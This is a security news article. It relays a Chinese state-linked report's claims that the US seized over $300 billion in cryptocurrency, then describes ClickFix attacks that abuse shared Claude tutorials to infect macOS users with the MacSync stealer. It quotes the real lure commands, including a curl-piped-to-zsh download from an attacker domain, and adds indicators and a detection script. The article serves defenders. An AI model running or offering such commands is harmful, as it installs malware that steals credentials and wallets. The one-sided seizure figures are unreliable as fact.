US Cyber Ops and AI‑Driven ClickFix Attacks: Seizing Crypto Assets and Targeting macOS Users
The article analyzes how U.S. government‑backed cyber operations have confiscated over $300 billion in global cryptocurrency assets and how attackers are abusing Anthropic's Claude platform to launch ClickFix attacks that deliver the MacSync trojan to macOS users, outlining the attack chain, capabilities, scale, and recommended defenses.
US‑led Global Virtual‑Currency Asset Seizure
According to a joint report by China’s National Computer Virus Emergency Response Center, the National Engineering Laboratory for Computer Virus Prevention, and 360 Digital Security Group, the total cryptocurrency market was valued at approximately $2.73 trillion at the end of January 2026, with Bitcoin accounting for $1.57 trillion (about 47% of world official gold reserves). The report states that between 2022 and 2025 the United States seized more than $300 billion of virtual‑currency assets worldwide.
The U.S. employs a three‑pronged system—technical advantage, legally binding regulations, and institutional execution—to conduct network attacks, regulatory blockades, targeted harvests, and offshore captures. From 2023 to 2025, U.S. government‑backed hacker groups launched directed attacks against more than 20 major cryptocurrency exchanges across Asia, Europe and Africa. Tactics included backdoor implantation, spear‑phishing, and supply‑chain infiltration, with the primary goal of stealing users’ wallet private keys, transaction logs and compliance data. Timeline analysis shows that several operations coincided with actions by the U.S. Department of Justice and OFAC, suggesting coordinated enforcement.
The underlying motive is described as reinforcing U.S. economic hegemony and the dominance of the dollar. Confiscated assets are auctioned; the FBI’s seizure of Silk Road bitcoins generated over $10 billion in proceeds, most of which entered federal revenue. DOJ data cited in the report indicate that annual enforcement in the virtual‑asset space adds hundreds of billions of dollars to the Treasury and further entrenches global reliance on the dollar.
ClickFix Attack Using Anthropic’s Claude Platform
Security researchers identified a new threat vector in which attackers abuse Anthropic’s Claude to lure macOS users into executing malicious terminal commands. Malicious Claude tutorial pages have recorded more than 15,600 views.
Attack Chain
SEO poisoning – Attackers purchase Google ads targeting keywords such as “online DNS resolver”, “macOS command‑line disk‑space analysis tool”, and “HomeBrew”.
Redirect to Claude content – Search results lead users to either publicly shared Claude “tutorials” or a forged Apple support page hosted on Medium.
Command lure – The pages display a message such as “To fix the issue, run the following command in Terminal…”. Two command variants observed:
echo "..." | base64 -D | zsh
true && curl -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh
Executing either variant downloads the MacSync information‑stealing trojan.
MacSync Trojan Capabilities
Keychain theft: extracts all passwords stored in the macOS keychain.
Browser data theft: steals passwords, cookies and history from Safari, Chrome and other browsers.
Crypto‑wallet theft: targets wallets such as MetaMask.
Screen recording: captures the user’s screen.
Audio capture: records ambient conversation via the microphone.
Command‑and‑control: communicates with the C2 server a2abotnet[.]com.
Stealth Features
A hard‑coded token is used to make its C2 traffic look like ordinary traffic.
Uses AppleScript for data exfiltration.
Retries upload up to eight times on failure.
Cleans traces after successful upload.
Scale and Impact
Malicious Claude tutorial pages have received more than 15,600 views, and the number is still rising.
Primary victims are high‑value macOS users—corporate executives, developers, designers and cryptocurrency investors—who typically hold larger account balances.
Why Victims Fall for the Attack
Trust in AI platforms leads users to assume Claude‑generated content is reliable.
Blind obedience to “tutorial” instructions.
Lack of understanding of base64 decoding and piped command execution.
Detection Indicators
Presence of base64 -D piped into a shell (decodes a hidden payload and executes it).
Patterns like curl … | bash/zsh (download‑and‑run).
Requests to copy unknown code into Terminal.
Claims of “fixing system issues” or “installing required components”.
Mitigation Guidance for macOS Users
Never run commands that are not fully understood, especially those involving pipelines.
Ask the AI for a safety check on any suggested command.
Download software only from official sources.
Keep Gatekeeper enabled and avoid bypassing security warnings.
Regularly audit the keychain for suspicious entries.
Enterprise‑Level Defenses
Monitor terminal command execution, focusing on base64 decoding and curl pipelines.
Deploy EDR solutions to detect known MacSync indicators.
Restrict user privileges so that routine work does not run with admin rights.
Conduct security awareness training emphasizing tutorial‑style social engineering.
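As an added example (not code from the article or from any vendor), the following Python scanner applies the detection indicators and monitoring advice above to constructed process‑execution log lines: it flags base64 decoding piped into a shell, curl or wget output piped into a shell, and the C2 domains named in the article. The extra check for curl’s -k/--insecure flag is my own addition, prompted by the -SsLfk options in the observed command; the log format and sample lines are assumptions.

```python
import re

# Indicator domains quoted in the article, kept in defanged form; the scanner
# normalises "[.]" to "." so both logged and defanged spellings are matched.
C2_DOMAINS = ("raxelpak[.]com", "a2abotnet[.]com")

# Each rule is (name, pattern). Patterns are deliberately narrow: they fire on
# the decode-and-execute and download-and-run shapes, not on ordinary use of
# base64 or curl (e.g. decoding a file to disk, or downloading with -o).
RULES = [
    ("base64-decode-to-shell",
     re.compile(r"base64\s+(-D|-d|--decode)\b[^|]*\|\s*(zsh|bash|sh)\b")),
    ("download-and-run",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(zsh|bash|sh)\b")),
    ("curl-insecure-tls",  # -k/--insecure, possibly bundled as in -SsLfk
     re.compile(r"\bcurl\b[^|]*(\s-[A-Za-z]*k[A-Za-z]*\b|--insecure)")),
]


def scan_command(cmd: str) -> list:
    """Return the names of every indicator that fires on one command line."""
    hits = [name for name, rx in RULES if rx.search(cmd)]
    normalised = cmd.lower().replace("[.]", ".")
    for domain in C2_DOMAINS:
        if domain.replace("[.]", ".") in normalised:
            hits.append("known-c2-domain:" + domain)
    return hits


def scan_log(lines):
    """Scan constructed process-execution records: '<timestamp> <user> <command>'."""
    findings = []
    for line in lines:
        timestamp, user, cmd = line.split(" ", 2)
        hits = scan_command(cmd)
        if hits:
            findings.append({"time": timestamp, "user": user,
                             "command": cmd, "indicators": hits})
    return findings


# Constructed sample telemetry: two benign lines, then the two lure variants
# from the article (payload body and hash left as "..." / "[hash]").
SAMPLE_LOG = [
    "2026-02-03T10:14:02Z alice curl -sSL https://example.org/tool.tar.gz -o tool.tar.gz",
    "2026-02-03T10:15:10Z alice base64 -D -i photo.b64 -o photo.jpg",
    '2026-02-03T10:20:44Z bob echo "..." | base64 -D | zsh',
    '2026-02-03T10:21:03Z bob true && curl -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["user"], f["indicators"], "::", f["command"])
```

In an EDR pipeline the same rules would run over the shell history or process-creation events rather than a static list; the benign lines show the rules do not fire on routine base64 or curl use.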
Platform Responsibility
Claude content is user‑generated; pre‑moderation of all submissions is infeasible.
Anthropic has added a disclaimer that content is user‑generated and unverified.
Improved anomaly‑detection mechanisms are needed.
Similar AI‑enabled attacks have been observed with ChatGPT (distribution of the AMOS trojan) and Grok (malware propagation), indicating that AI content platforms are becoming fertile ground for malicious software distribution.
Conclusion
The ClickFix attack demonstrates that AI‑generated tutorials can lower the barrier for delivering malicious payloads. macOS terminals remain the highest‑privilege entry point, and any “tutorial” that asks users to paste commands should be treated with extreme caution.